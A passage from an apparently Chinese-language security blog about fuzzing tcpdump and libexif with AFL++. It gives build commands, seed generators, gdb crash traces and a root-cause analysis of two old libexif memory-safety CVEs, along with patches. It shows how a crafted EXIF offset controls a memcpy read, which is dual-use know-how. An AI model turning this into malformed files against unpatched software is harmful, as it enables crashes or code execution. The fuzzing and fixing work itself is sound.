    --args "$TARGET" -vvvvXX -ee -nn -r "$crash_file" >>"$OUTPUT_LOG" 2>&1

  echo -e "\n" >>"$OUTPUT_LOG"
done

echo "[+] Done! Result in: $OUTPUT_LOG"

有点烦，直接让 AI 再生成几个样本一起加进去：

#!/usr/bin/env python3

import os
import binascii
from scapy.all import *

# 加载扩展协议
load_contrib("bgp")
load_contrib("ospf")

# 创建语料目录
CORPUS_DIR = "corpus"
if not os.path.exists(CORPUS_DIR):
    os.makedirs(CORPUS_DIR)

def save_pcap(name, pkts):
    wrpcap(os.path.join(CORPUS_DIR, f"{name}.pcap"), pkts)

def generate_corpus():
    print("正在生成初始语料...")

    # 1. 基础以太网 + IPv4 + TCP (带有各种标志)
    save_pcap("tcp_flags", [
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, flags="S"),
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, flags="PA"),
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, flags="F"),
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, flags="R"),
    ])

    # 2. UDP + DNS 查询
    save_pcap("dns_query", [
        Ether()/IP(dst="8.8.8.8")/UDP(dport=53)/DNS(rd=1, qd=DNSQR(qname="www.google.com"))
    ])

    # 3. ICMP (Ping, Unreachable)
    save_pcap("icmp", [
        Ether()/IP(dst="1.2.3.4")/ICMP(type=8),  # Echo Request
        Ether()/IP(dst="1.2.3.4")/ICMP(type=3, code=3),  # Port Unreachable
    ])

    # 4. IPv6 基础数据包
    save_pcap("ipv6_base", [
        Ether()/IPv6(dst="2001:4860:4860::8888")/TCP(dport=443),
        Ether()/IPv6(dst="2001:4860:4860::8888")/ICMPv6EchoRequest(),
    ])

    # 5. ARP 请求与应答
    save_pcap("arp", [
        Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.1"),
        Ether()/ARP(op=2, psrc="192.168.1.1", hwsrc="00:11:22:33:44:55")
    ])

    # 6. HTTP 请求 (简单应用层负载)
    http_payload = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
    save_pcap("http_get", [
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, flags="PA")/Raw(load=http_payload)
    ])

    # 7. 带有选项的 IP/TCP (测试解析器对选项的处理)
    save_pcap("options", [
        Ether()/IP(dst="1.2.3.4", options=[IPOption(b'\x83\x03\x10')])/TCP(dport=80),
        Ether()/IP(dst="1.2.3.4")/TCP(dport=80, options=[('MSS', 1460), ('NOP', None), ('WScale', 7)])
    ])

    # 8. 分片包 (Fragmentation)
    payload = "A" * 100
    pkts = fragment(IP(dst="1.2.3.4")/UDP(dport=123)/payload, fragsize=40)
    save_pcap("fragments", pkts)

    # 9. BOOTP & DHCP (丰富样本)
    # 9.1 基础 BOOTP 请求与应答
    save_pcap("bootp_base", [
        Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr="00:11:22:33:44:55"),
        Ether(src="00:11:22:33:44:55")/IP(src="192.168.1.1", dst="192.168.1.100")/UDP(sport=67, dport=68)/BOOTP(op=2, yiaddr="192.168.1.100", siaddr="192.168.1.1", chaddr="00:11:22:33:44:55")
    ])

    # 9.2 DHCP 完整交互 (Discover, Offer, Request, Ack)
    chaddr = "00:de:ad:be:ef:00"
    transaction_id = 0x12345678
    save_pcap("dhcp_full_flow", [
        # Discover
        Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=transaction_id, chaddr=chaddr)/DHCP(options=[("message-type", "discover"), "end"]),
        # Offer
        Ether(dst=chaddr)/IP(src="192.168.1.1", dst="192.168.1.100")/UDP(sport=67, dport=68)/BOOTP(op=2, xid=transaction_id, yiaddr="192.168.1.100", siaddr="192.168.1.1", chaddr=chaddr)/DHCP(options=[("message-type", "offer"), ("server_id", "192.168.1.1"), ("lease_time", 86400), "end"]),
        # Request
        Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(xid=transaction_id, chaddr=chaddr)/DHCP(options=[("message-type", "request"), ("requested_addr", "192.168.1.100"), ("server_id", "192.168.1.1"), "end"]),
        # Ack
        Ether(dst=chaddr)/IP(src="192.168.1.1", dst="192.168.1.100")/UDP(sport=67, dport=68)/BOOTP(op=2, xid=transaction_id, yiaddr="192.168.1.100", siaddr="192.168.1.1", chaddr=chaddr)/DHCP(options=[("message-type", "ack"), ("server_id", "192.168.1.1"), ("lease_time", 86400), "end"])
    ])

    # 9.3 带有复杂选项的 DHCP (测试解析器健壮性)
    save_pcap("dhcp_options", [
        Ether()/IP(src="0.0.0.0", dst="255.255.255.255")/UDP(sport=68, dport=67)/BOOTP(chaddr=chaddr)/DHCP(options=[
            ("message-type", "discover"),
            ("hostname", "fuzz-target-node"),
            ("param_req_list", [1, 3, 6, 12, 15, 28, 42]),
            ("vendor_class_id", b"MSFT 5.0"),
            ("client_id", b"\x01" + binascii.unhexlify(chaddr.replace(':',''))),
            "end"
        ])
    ])

    # 10. BGP (历史上漏洞极多)
    # 模拟一个 BGP Keepalive 和 Open 消息
    save_pcap("bgp", [
        Ether()/IP(dst="1.1.1.1")/TCP(sport=179, dport=179)/BGPHeader(type=4), # Keepalive
        Ether()/IP(dst="1.1.1.1")/TCP(sport=179, dport=179)/BGPHeader(type=1)/BGPOpen(my_as=65000, hold_time=180) # Open
    ])

    # 11. SNMP (复杂编码，易出洞)
    save_pcap("snmp", [
        Ether()/IP(dst="1.2.3.4")/UDP(sport=161, dport=161)/SNMP(community="public", PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1.2.1.1.1.0"))]))
    ])

    # 12. OSPF (路由协议解析器很复杂)
    save_pcap("ospf", [
        Ether()/IP(dst="224.0.0.5")/OSPF_Hdr(type=1)/OSPF_Hello(router="1.1.1.1", mask="255.255.255.0")
    ])

    # 13. 畸形数据包 (Fuzz 核心：故意破坏长度字段)
    # 构造一个 IP 长度字段远大于实际数据的包
    malformed_ip = IP(len=100, dst="1.2.3.4")/TCP(dport=80)
    save_pcap("malformed_len", [Ether()/malformed_ip])

    # 14. 802.1Q VLAN 嵌套
    save_pcap("vlan", [
        Ether()/Dot1Q(vlan=10)/Dot1Q(vlan=20)/IP()/TCP()
    ])

    print(f"语料生成完成，保存在 {CORPUS_DIR} 目录下。")

if __name__ == "__main__":
    generate_corpus()

并且我加入 AFL_LLVM_CMPLOG=1 编译了 CMPLOG 的版本，然后使用下面的指令重新 fuzz 。此外，这次用两个线程，我就不信这次还跑不出来/mad

mkdir -p /dev/shm/asan
mkdir -p /dev/shm/asan_cmplog

AFL_TMPDIR=/dev/shm/asan \
afl-fuzz -i clean_seeds_v4 \
         -o outs_v4 \
         -s 1337 \
         -m none \
         -M asan \
         -- ./tcpdump-fuzz/sbin/tcpdump -vvvvXX -ee -nn -r @@

AFL_TMPDIR=/dev/shm/asan_cmplog \
afl-fuzz -i clean_seeds_v4 \
         -o outs_v4 \
         -m none \
         -c ./tcpdump-fuzz-cmplog/sbin/tcpdump \
         -S asan_cmplog \
         -- ./tcpdump-fuzz-cmplog/sbin/tcpdump -vvvvXX -ee -nn -r @@

传下去，我放弃了。

哥们 fuzz 了三天出了一堆别的 CVE，就是没有能和 CVE-2017-13028 对上的……反正这个 chall 主要是教我们使用 ASAN 的，我们已经学会了，那就到此为止吧！

btw ASAN 的 backtrace 还是很帅的（

Fuzz two legacy CVEs in libexif

Tue, 24 Feb 2026 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

Target CVEs

Description

Compile

Download

git clone https://github.com/libexif/libexif.git
cd libexif && git checkout libexif-0_6_14-release

Build

这里由于我在 make 的时候有关生成文档的地方报错了，所以我手动将文档部分 patch 掉：

- SUBDIRS = m4m po libexif test doc binary
+ SUBDIRS = m4m po libexif test binary

autoreconf -fvi
CC=clang CXX=clang++ CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" ./configure --enable-shared=no --prefix="$PWD/../workshop/lib-debug/"
make -j`nproc` && make install
make clean

CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --enable-shared=no --prefix="$PWD/../workshop/lib-fuzz/"
make -j`nproc` && make install

由于 libexif 只是一个库，所以我们要 fuzz 它需要自己找个前端，或者手写 harness 。方便起见，我直接使用 exif 作为前端。

git clone https://github.com/libexif/exif.git
cd exif && git checkout exif-0_6_15-release
autoreconf -fvi
CC=clang CXX=clang++ CFLAGS="-O0 -g -fno-inline -fno-builtin -fno-omit-frame-pointer" CXXFLAGS="$CFLAGS" PKG_CONFIG_PATH="$PWD/../workshop/lib-debug/lib/pkgconfig/" ./configure --enable-shared=no --prefix="$PWD/../workshop/exif-debug"
make -j`nproc` && make install
make clean

CC=afl-clang-lto CXX=afl-clang-lto++ PKG_CONFIG_PATH="$PWD/../workshop/lib-fuzz/lib/pkgconfig/" ./configure --enable-shared=no --prefix="$PWD/../workshop/exif-fuzz"
make -j`nproc` && make install

Samples

#!/usr/bin/env python3

import struct
import os

def pack_data(fmt, endian, *args):
    return struct.pack(('<' if endian == 'LE' else '>') + fmt, *args)

class ExifGenerator:
    def __init__(self, endian='LE'):
        self.endian = endian
        self.entries = []
        self.data_blobs = b''

    def add_entry(self, tag, data_type, count, value):
        self.entries.append({'tag': tag, 'type': data_type, 'count': count, 'value': value})

    def build_ifd(self, start_offset, next_ifd_offset=0):
        ifd_data = pack_data('H', self.endian, len(self.entries))
        data_offset = start_offset + 2 + (len(self.entries) * 12) + 4

        entry_bytes = b''
        blob_bytes = b''

        for e in self.entries:
            val_bytes = b''
            raw_blob = None

            if e['type'] == 1: # BYTE
                if isinstance(e['value'], int): raw_blob = pack_data('B', self.endian, e['value'])
                else: raw_blob = e['value']
            elif e['type'] == 2: # ASCII
                raw_blob = e['value'].encode('ascii') + b'\x00'
            elif e['type'] == 3: # SHORT
                if e['count'] == 1: raw_blob = pack_data('H', self.endian, e['value'])
                else: raw_blob = pack_data('H'*e['count'], self.endian, *e['value'])
            elif e['type'] == 4: # LONG
                if e['count'] == 1: raw_blob = pack_data('I', self.endian, e['value'])
                else: raw_blob = pack_data('I'*e['count'], self.endian, *e['value'])
            elif e['type'] == 5: # RATIONAL
                raw_blob = pack_data('II', self.endian, e['value'][0], e['value'][1])
            elif e['type'] == 7: # UNDEFINED
                raw_blob = e['value']
            elif e['type'] == 10: # SRATIONAL
                raw_blob = pack_data('ii', self.endian, e['value'][0], e['value'][1])

            if len(raw_blob) <= 4:
                val_bytes = raw_blob.ljust(4, b'\x00')
            else:
                off = data_offset + len(blob_bytes)
                val_bytes = pack_data('I', self.endian, off)
                blob_bytes += raw_blob

            entry_bytes += pack_data('HHII', self.endian, e['tag'], e['type'], e['count'], struct.unpack('<I' if self.endian == 'LE' else '>I', val_bytes)[0])

        return ifd_data + entry_bytes + pack_data('I', self.endian, next_ifd_offset) + blob_bytes

def create_complex_exif(endian='LE'):
    # 1. Build Exif SubIFD
    exif = ExifGenerator(endian)
    exif.add_entry(0x9003, 2, 20, "2026:02:24 14:00:00")
    exif.add_entry(0x829a, 5, 1, (1, 100))
    exif.add_entry(0x829d, 5, 1, (28, 10))
    exif.add_entry(0x9204, 10, 1, (-1, 3))
    exif.add_entry(0x9286, 7, 8, b"USERCOM\x00")
    exif_sub_data = exif.build_ifd(0) # Length check only first

    # 2. Build GPS IFD
    gps = ExifGenerator(endian)
    gps.add_entry(0x0000, 1, 4, b'\x02\x02\x00\x00')
    gps.add_entry(0x0002, 5, 3, (1, 1)) # This will actually need 3 rationals, but let's keep it simple
    # Fix: GPS Latitude is 3 rationals
    gps.entries[-1] = {'tag': 0x0002, 'type': 5, 'count': 3, 'value': (40, 1, 30, 1, 15, 1)}
    gps_data = gps.build_ifd(0)

    # 3. Build IFD0
    ifd0 = ExifGenerator(endian)
    ifd0.add_entry(0x010e, 2, 11, "Fuzz Test")
    ifd0.add_entry(0x0110, 2, 11, "Gemini Cam")
    ifd0.add_entry(0x8769, 4, 1, 0) # ExifOffset
    ifd0.add_entry(0x8825, 4, 1, 0) # GPSInfo

    # IFD0 fixed size: 2 + 4*12 + 4 = 54. Blobs: 11 + 11 = 22. Total = 76.
    ifd0_total_len = 76
    exif_offset = 8 + ifd0_total_len
    gps_offset = exif_offset + len(exif_sub_data)

    for e in ifd0.entries:
        if e['tag'] == 0x8769: e['value'] = exif_offset
        if e['tag'] == 0x8825: e['value'] = gps_offset

    final_ifd0 = ifd0.build_ifd(8)
    final_exif = exif.build_ifd(exif_offset)
    final_gps = gps.build_ifd(gps_offset)

    header = b'II\x2a\x00\x08\x00\x00\x00' if endian == 'LE' else b'MM\x00\x2a\x00\x00\x00\x08'
    return header + final_ifd0 + final_exif + final_gps

def save_corpus(name, data, add_exif_header=False):
    os.makedirs('corpus/exif', exist_ok=True)
    with open(os.path.join('corpus/exif', name), 'wb') as f:
        if add_exif_header: f.write(b'Exif\x00\x00')
        f.write(data)
    print(f"Created {name}")

if __name__ == "__main__":
    save_corpus('rich_le.exif', create_complex_exif('LE'), True)
    save_corpus('rich_be.exif', create_complex_exif('BE'), True)

    SOI, APP1 = b'\xff\xd8', b'\xff\xe1'
    exif_payload = b'Exif\x00\x00' + create_complex_exif('LE')
    app1_data = APP1 + struct.pack('>H', len(exif_payload) + 2) + exif_payload
    save_corpus('rich_jpeg.jpg', SOI + app1_data + b'\xff\xd9')
    save_corpus('raw_tiff.exif', create_complex_exif('LE'), False)

Fuzzing

AFLplusplus go work: afl-fuzz -i - -o out/ -s 1337 -- ./exif-fuzz/bin/exif @@.

这个 Gemini Cam 还挺滑稽的哈哈哈：

13 个 crashes，4 个 hangs，其中有这几种独立的 crash 情况：

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e595c1 in memcpy () from /usr/lib64/libc.so.6
#0  0x00007ffff7e595c1 in memcpy () from /usr/lib64/libc.so.6
#1  0x0000555555565553 in exif_data_load_data_thumbnail (data=0x5555555931e0, d=0x555555595986 "II*", ds=256, offset=4294967168, size=232) at exif-data.c:292
#2  0x0000555555563d05 in exif_data_load_data_content (data=0x5555555931e0, ifd=EXIF_IFD_EXIF, d=0x555555595986 "II*", ds=256, offset=86, recursion_depth=1) at exif-data.c:381
#3  0x0000555555563b36 in exif_data_load_data_content (data=0x5555555931e0, ifd=EXIF_IFD_0, d=0x555555595986 "II*", ds=256, offset=10, recursion_depth=0) at exif-data.c:361
#4  0x0000555555563621 in exif_data_load_data (data=0x5555555931e0, d_orig=0x555555595980 "Exif", ds_orig=262) at exif-data.c:813
#5  0x000055555556cb9b in exif_loader_get_data (loader=0x555555593190) at exif-loader.c:387
#6  0x000055555555f73e in main (argc=2, argv=0x7fffffffdca8) at main.c:438

Program received signal SIGSEGV, Segmentation fault.
0x000055555556e60f in exif_get_slong (b=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:129
129     return ((b[3] << 24) | (b[2] << 16) | (b[1] << 8) | b[0]);
#0  0x000055555556e60f in exif_get_slong (b=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:129
#1  0x000055555556e49f in exif_get_long (buf=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:156
#2  0x0000555555566026 in exif_entry_fix (e=0x555555593460) at exif-entry.c:189
#3  0x0000555555562d6d in fix_func (e=0x555555593460, data=0x0) at exif-content.c:211
#4  0x0000555555562a13 in exif_content_foreach_entry (content=0x555555593270, func=0x555555562d50 <fix_func>, data=0x0) at exif-content.c:185
#5  0x0000555555562bdc in exif_content_fix (c=0x555555593270) at exif-content.c:225
#6  0x0000555555565481 in fix_func (c=0x555555593270, data=0x0) at exif-data.c:1082
#7  0x00005555555650ca in exif_data_foreach_content (data=0x5555555931e0, func=0x5555555653e0 <fix_func>, user_data=0x0) at exif-data.c:965
#8  0x00005555555643d4 in exif_data_fix (d=0x5555555931e0) at exif-data.c:1087
#9  0x0000555555563886 in exif_data_load_data (data=0x5555555931e0, d_orig=0x555555595980 "", ds_orig=82) at exif-data.c:826
#10 0x000055555556cbeb in exif_loader_get_data (loader=0x555555593190) at exif-loader.c:368
#11 0x000055555555f75e in main (argc=2, argv=0x7fffffffdbe8) at main.c:438

Program received signal SIGSEGV, Segmentation fault.
0x000055555556e3d2 in exif_get_sshort (buf=0x555655595985 <error: Cannot access memory at address 0x555655595985>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:92
92     return ((buf[1] << 8) | buf[0]);
#0  0x000055555556e3d2 in exif_get_sshort (buf=0x555655595985 <error: Cannot access memory at address 0x555655595985>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:92
#1  0x000055555556e33f in exif_get_short (buf=0x555655595985 <error: Cannot access memory at address 0x555655595985>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:100
#2  0x0000555555563671 in exif_data_load_data (data=0x5555555931e0, d_orig=0x555555595980 "Exif", ds_orig=61) at exif-data.c:775
#3  0x000055555556cbeb in exif_loader_get_data (loader=0x555555593190) at exif-loader.c:368
#4  0x000055555555f75e in main (argc=2, argv=0x7fffffffdbe8) at main.c:438

hang 的情况比较唯一，全是卡在 exif_loader_write 这里：

这里附赠一个我看各个崩溃回溯的脚本：

#!/usr/bin/env bash

TARGET="./exif-debug/bin/exif"
CRASH_DIR="./out/default/crashes"
OUTPUT_LOG="crash_reports.txt"

>"$OUTPUT_LOG"

echo "[+] Analysing crashes in $CRASH_DIR..."

for crash_file in "$CRASH_DIR"/id:*; do
  [ -e "$crash_file" ] || continue

  echo "--------------------------------------------------" >>"$OUTPUT_LOG"
  echo "File: $(basename "$crash_file")" >>"$OUTPUT_LOG"

  gdb --batch \
    --ex "run" \
    --ex "bt" \
    --ex "quit" \
    --args "$TARGET" "$crash_file" >>"$OUTPUT_LOG" 2>&1

  echo -e "\n" >>"$OUTPUT_LOG"
done

echo "[+] Done! Result in: $OUTPUT_LOG"

Analysis

这个项目有 API 文档，不用自己猜函数功能了：libexif Project Documentation.

~~好的，继续玩 MC，快开学了，谁学啊！？~~

CVE-2012-2836

先分析一下这个样本，栈回溯如下：

#0  0x00007ffff7e595c1 in memcpy () from /usr/lib64/libc.so.6
#1  0x0000555555565553 in exif_data_load_data_thumbnail (data=0x5555555931e0, d=0x555555595986 "II*", ds=256, offset=4294967168, size=232) at exif-data.c:292
#2  0x0000555555563d05 in exif_data_load_data_content (data=0x5555555931e0, ifd=EXIF_IFD_EXIF, d=0x555555595986 "II*", ds=256, offset=86, recursion_depth=1) at exif-data.c:381
#3  0x0000555555563b36 in exif_data_load_data_content (data=0x5555555931e0, ifd=EXIF_IFD_0, d=0x555555595986 "II*", ds=256, offset=10, recursion_depth=0) at exif-data.c:361
#4  0x0000555555563621 in exif_data_load_data (data=0x5555555931e0, d_orig=0x555555595980 "Exif", ds_orig=262) at exif-data.c:813
#5  0x000055555556cb9b in exif_loader_get_data (loader=0x555555593190) at exif-loader.c:387
#6  0x000055555555f73e in main (argc=2, argv=0x7fffffffdca8) at main.c:438

exif_loader_get_data 负责为 ExifData 结构体开辟空间，然后使用 exif_data_load_data 将内存中的 JPEG / EXIF header, byte order, fixed value 等信息加载到 ExifData 结构体中，进行一些简单的校验，并初始化 IFD 0 和 IFD 1。初始化 IFD 字段是通过调用 exif_data_load_data_content 实现的。

根据这个 switch 就可以看出来，很显然，load data content 大致应该就是将 exif 图片的各个字段信息加载进去。

继续调试，我们在 EXIF_TAG_EXIF_IFD_POINTER 这个 case 调用了 exif_data_load_data_content，此时传入的 ifd 为 EXIF_IFD_EXIF，而我们后续也是在这里面执行 exif_data_load_data_thumbnail 时崩溃的，所以要重点分析一下这部分。

首先确定一下在第几次循环的时候崩溃，我们直接 c 让它崩，然后切换到对应栈帧查看 i，发现是第 13 次调用了 exif_data_load_data_thumbnail：

然后通过 if i == 13 下条件断点，定位到触发崩溃的循环索引继续分析。由于这里有两个调用 exif_data_load_data_thumbnail 的位置，而我们不知道具体会调用哪一个，因此如果我们下的那个断点不是实际的调用点，那就停不下来了。所以这里两个位置都需要下一个断点：

最后我们发现它执行的是 381 行处的代码，整洁起见，之前 374 行处的断点就可以删掉了。

步入继续，发现致使 memcpy 崩溃的原因是 rsi 无法解引用：

接下来重点看这个 exif_data_load_data_thumbnail 的逻辑：

// ► 0x555555563d00 <exif_data_load_data_content+1168>    call   exif_data_load_data_thumbnail <exif_data_load_data_thumbnail>
//        rdi: 0x555555593240 —▸ 0x5555555932d0 —▸ 0x5555555934a0 —▸ 0x555555593420 ◂— 0x200000110
//        rsi: 0x555555595986 ◂— 0x8002a4949 /* 'II*' */
//        rdx: 0x100
//        rcx: 0xffffff80
//        r8: 0xe8

static void
exif_data_load_data_thumbnail (ExifData *data, const unsigned char *d,
          unsigned int ds, ExifLong offset, ExifLong size)
{
 if (ds < offset + size) {
  exif_log (data->priv->log, EXIF_LOG_CODE_DEBUG, "ExifData",
     "Bogus thumbnail offset and size: %i < %i + %i.",
     (int) ds, (int) offset, (int) size);
  return;
 }
 if (data->data)
  exif_mem_free (data->priv->mem, data->data);
 data->size = size;
 data->data = exif_data_alloc (data, data->size);
 if (!data->data)
  return;
 memcpy (data->data, d + offset, data->size);
}

通过调试，我们可知它根本不会进入那三个 if branch，也就是说，这个函数只执行了如下三行代码：

data->size = size;
data->data = exif_data_alloc (data, data->size);
memcpy (data->data, d + offset, data->size);

即将 size 设置为 r8，将 data 设置为 exif_data_alloc 分配出来的值，而 src 则是 d + offset 的值，即 rsi + 0xffffff80：

显然，这个 offset 特别大，而经调试，我们的 rsi 其实是合法值，那么问题就处在 offset 上了。

回溯发现，在给 exif_data_load_data_thumbnail 传参时，offset 的值就有问题了：

通过查看二进制数据，我们很容易定位到一个类似的数据：

尝试直接将其修改为 0xCAFEBABE，然后再调试一下。调试之前我们可以先使用 save breakpoints bps 将断点信息保存到 bps 文件，之后通过 source bps 加载。

可见，我们可以通过控制图片的内部数据信息来控制 memcpy 的行为，至于具体怎么利用，利用后有什么效果，我就不分析了。直接确定一下 CVE ID，发现这个 CVE-2012-2836 的描述比较符合我们的分析结果。

CVE-2009-3895

Program received signal SIGSEGV, Segmentation fault.
0x000055555556e60f in exif_get_slong (b=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:129
129     return ((b[3] << 24) | (b[2] << 16) | (b[1] << 8) | b[0]);
#0  0x000055555556e60f in exif_get_slong (b=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:129
#1  0x000055555556e49f in exif_get_long (buf=0x5555555b2000 <error: Cannot access memory at address 0x5555555b2000>, order=EXIF_BYTE_ORDER_INTEL) at exif-utils.c:156
#2  0x0000555555566026 in exif_entry_fix (e=0x555555593460) at exif-entry.c:189
#3  0x0000555555562d6d in fix_func (e=0x555555593460, data=0x0) at exif-content.c:211
#4  0x0000555555562a13 in exif_content_foreach_entry (content=0x555555593270, func=0x555555562d50 <fix_func>, data=0x0) at exif-content.c:185
#5  0x0000555555562bdc in exif_content_fix (c=0x555555593270) at exif-content.c:225
#6  0x0000555555565481 in fix_func (c=0x555555593270, data=0x0) at exif-data.c:1082
#7  0x00005555555650ca in exif_data_foreach_content (data=0x5555555931e0, func=0x5555555653e0 <fix_func>, user_data=0x0) at exif-data.c:965
#8  0x00005555555643d4 in exif_data_fix (d=0x5555555931e0) at exif-data.c:1087
#9  0x0000555555563886 in exif_data_load_data (data=0x5555555931e0, d_orig=0x555555595980 "", ds_orig=82) at exif-data.c:826
#10 0x000055555556cbeb in exif_loader_get_data (loader=0x555555593190) at exif-loader.c:368
#11 0x000055555555f75e in main (argc=2, argv=0x7fffffffdbe8) at main.c:438

直接调，调就完了。

一开始都是差不多的，exif_data_fix 的作用是将不符合规格的 exif 数据修复，使其符合规范，内部其实就是对 exif_data_foreach_content 的包装，而 exif_data_foreach_content 则是对每一个 IFD 执行指定的函数，这里是 fix_func ……

其实我觉得没必要从 main 开始分析，直接从崩溃边界开始分析就好了，所以接下来我会从后往前分析。

可以看到，是 rax 无法解引用导致的问题。入口是 exif_entry_fix 之后的 exif_get_long。

回溯到调用 exif_get_long 的函数 exif_entry_fix：

我们发现这里是一个 for 循环，并且此时的索引是 31440，巨大无比，显然不正常，而索引范围是 e->components 指定的：

这都十亿多次了，所以问题就是没有验证这个 component 大小的合法性。此外，这个大小也是攻击者可控的：

components 肯定代表了组件数量，什么东西的组件数量？翻代码，发现是 ExifEntry：

通过查询 exif 标准 [^1] 我们可知，一个 ExifEntry 由 Format，Components 和 Data 组成。如果 format 类型是 unsigned short，则它代表每个 component 占用 2 bytes，而 components 则代表了这样的组件有几个，将它和 format 相乘即是这一 entry 总共占用的字节数。

所以这里的问题显然就是 e->components 很大，而 e->data 分配的内存很小，导致 OOB 。而在计算 e->size = e->components * exif_format_get_size(e->format) 时，如果 components 特别大也有可能发生溢出，导致最后得到一个特别小的值。如果后续用这个特别小的 size 去申请内存，就会有申请大小远小于实际需求的问题，写入将直接崩溃或允许执行任意代码。

定位一下 CVE，发现符合 CVE-2009-3895 的描述。至此，这个 chall 要求的两个 CVE 我们均已找齐，剩下那几个 crashes 和 hang 我就不分析了，懒（

Fix

CVE-2012-2836

调试发现，这个非法 offset 来自 exif_get_long 函数，我们深入分析一下它的逻辑。

首先调用入口是：

  case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
   o = exif_get_long (d + offset + 12 * i + 8,
        data->priv->order);

所以它是取 d + offset + 12 * i + 8 这个偏移处的值。查阅文档，我们可知它就是返回一个 uint32_t 类型，而它内部使用的 exif_get_slong 会返回一个 int32_t 类型：

ExifLong
exif_get_long (const unsigned char *buf, ExifByteOrder order)
{
        return (exif_get_slong (buf, order) & 0xffffffff);
}

ExifSLong
exif_get_slong (const unsigned char *b, ExifByteOrder order)
{
 if (!b) return 0;
        switch (order) {
        case EXIF_BYTE_ORDER_MOTOROLA:
                return ((b[0] << 24) | (b[1] << 16) | (b[2] << 8) | b[3]);
        case EXIF_BYTE_ORDER_INTEL:
                return ((b[3] << 24) | (b[2] << 16) | (b[1] << 8) | b[0]);
        }

 /* Won't be reached */
 return (0);
}

虽然通过 & 0xffffffff 截断处理了整数溢出问题，但是 0xffffffff 依旧可以表示一个巨大的范围，大概 4 GB？所以问题就在于，它没检查偏移是否合理。

解决方法很简单，只要将 offset 限制在 ds 的范围内即可。ds 代表了 data size, 也就是整个图像数据的大小边界。超过 ds 肯定是不对的。

    case EXIF_TAG_JPEG_INTERCHANGE_FORMAT:
      o = exif_get_long(d + offset + 12 * i + 8, data->priv->order);
+      if (o >= ds) {
+        exif_log(data->priv->log, EXIF_LOG_CODE_CORRUPT_DATA, "ExifData",
+                 "Illegal offset value detected!");
+        abort();
      }

CVE-2009-3895

分析的时候已经写过问题了，修复方法就是校验 components 与当前 size 是否匹配：

  case EXIF_TAG_SHARPNESS:
    switch (e->format) {
    case EXIF_FORMAT_LONG:
      if (!e->parent || !e->parent->parent)
        break;
+      if (e->components <= 0 || e->components > 65535) {
+        exif_entry_log(e, EXIF_LOG_CODE_CORRUPT_DATA,
+                       "Component size is too large!");
+        abort();
+      }
+      if (e->size < e->components * exif_format_get_size(EXIF_FORMAT_LONG)) {
+        exif_entry_log(e, EXIF_LOG_CODE_CORRUPT_DATA,
+                       "Corrupted data size detected!");
+        abort();
+      };
      o = exif_data_get_byte_order(e->parent->parent);
      for (i = 0; i < e->components; i++)
        exif_set_short(
            e->data + i * exif_format_get_size(EXIF_FORMAT_SHORT), o,
            (ExifShort)exif_get_long(
                e->data + i * exif_format_get_size(EXIF_FORMAT_LONG), o));
      e->format = EXIF_FORMAT_SHORT;
      e->size = e->components * exif_format_get_size(e->format);
      e->data = exif_entry_realloc(e, e->data, e->size);
      exif_entry_log(e, EXIF_LOG_CODE_DEBUG,
                     _("Tag '%s' was of format '%s' (which is "
                       "against specification) and has been "
                       "changed to format '%s'."),
                     exif_tag_get_name(e->tag),
                     exif_format_get_name(EXIF_FORMAT_LONG),
                     exif_format_get_name(EXIF_FORMAT_SHORT));
      break;

成功修复：

但是发现 rational 类型也有问题，不过直接使用和上面一样的 patch 方案就能解决。

  case EXIF_TAG_FOCAL_LENGTH:
    switch (e->format) {
    case EXIF_FORMAT_SRATIONAL:
      if (!e->parent || !e->parent->parent)
        break;
+      if (e->components <= 0 || e->components > 65535) {
+        exif_entry_log(e, EXIF_LOG_CODE_CORRUPT_DATA,
+                       "Component size is too large!");
+        abort();
+      }
+      if (e->size < e->components * exif_format_get_size(EXIF_FORMAT_LONG)) {
+        exif_entry_log(e, EXIF_LOG_CODE_CORRUPT_DATA,
+                       "Corrupted data size detected!");
+        abort();
+      };
      o = exif_data_get_byte_order(e->parent->parent);
      for (i = 0; i < e->components; i++) {
        sr = exif_get_srational(
            e->data + i * exif_format_get_size(EXIF_FORMAT_SRATIONAL), o);
        r.numerator = (ExifLong)sr.numerator;
        r.denominator = (ExifLong)sr.denominator;
        exif_set_rational(
            e->data + i * exif_format_get_size(EXIF_FORMAT_RATIONAL), o, r);
      }
      e->format = EXIF_FORMAT_RATIONAL;
      exif_entry_log(e, EXIF_LOG_CODE_DEBUG,
                     _("Tag '%s' was of format '%s' (which is "
                       "against specification) and has been "
                       "changed to format '%s'."),
                     exif_tag_get_name(e->tag),
